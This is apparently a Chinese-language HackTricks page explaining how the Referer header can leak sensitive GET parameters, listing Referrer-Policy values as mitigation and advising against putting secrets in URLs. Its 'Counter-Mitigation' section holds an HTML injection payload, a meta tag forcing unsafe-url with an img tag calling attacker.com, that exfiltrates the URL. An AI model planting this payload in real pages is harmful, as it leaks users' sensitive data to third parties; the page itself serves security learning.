tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
引荐头和策略
Referrer 是浏览器用来指示上一个访问页面的头部。
敏感信息泄露
如果在某个网页中,任何敏感信息位于 GET 请求参数中,如果该页面包含指向外部源的链接,或者攻击者能够使/建议(社会工程学)用户访问一个由攻击者控制的 URL。它可能能够在最新的 GET 请求中提取敏感信息。
缓解措施
您可以让浏览器遵循一个 Referrer-policy,以 避免 将敏感信息发送到其他网络应用程序:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Counter-Mitigation
您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入):
html
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
永远不要将任何敏感数据放入URL中的GET参数或路径中。
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。